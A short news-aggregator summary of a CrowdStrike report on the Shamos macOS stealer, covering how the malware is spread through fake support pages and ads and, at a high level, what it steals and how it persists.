Particle.news
Download on the App Store
3 ARTICLES
·
3h ago

Cookie Spider Pushes New ‘Shamos’ Mac Stealer Through Fake Fixes, Researchers Say

CrowdStrike reports over 300 attempted infections since June after fake support pages prompt a one-line Terminal command that bypasses Gatekeeper.

macOS malware SHAMOS
Phony Apple help ads push malware that bypasses Mac security

Overview

  • The AMOS-family variant, dubbed Shamos, harvests Keychain items, Apple Notes, browser data and cryptocurrency wallets, then zips and exfiltrates the files using curl.
  • Distribution relies on malvertising and ClickFix pages or fake GitHub repositories that instruct users to paste a single command, which downloads a Bash script and the Mach-O payload.
  • The script removes Gatekeeper quarantine with xattr and chmod, captures the user’s password, performs anti-VM checks and conducts host reconnaissance via AppleScript.
  • When run with sudo, Shamos creates a LaunchDaemons plist named com.finder.helper.plist for persistence and can pull additional payloads, including a spoofed Ledger Live app and a botnet module.
  • CrowdStrike observed global targeting and evidence of an impersonated Australia-based electronics retailer in Google Ads, with ads intentionally not served to Russian users.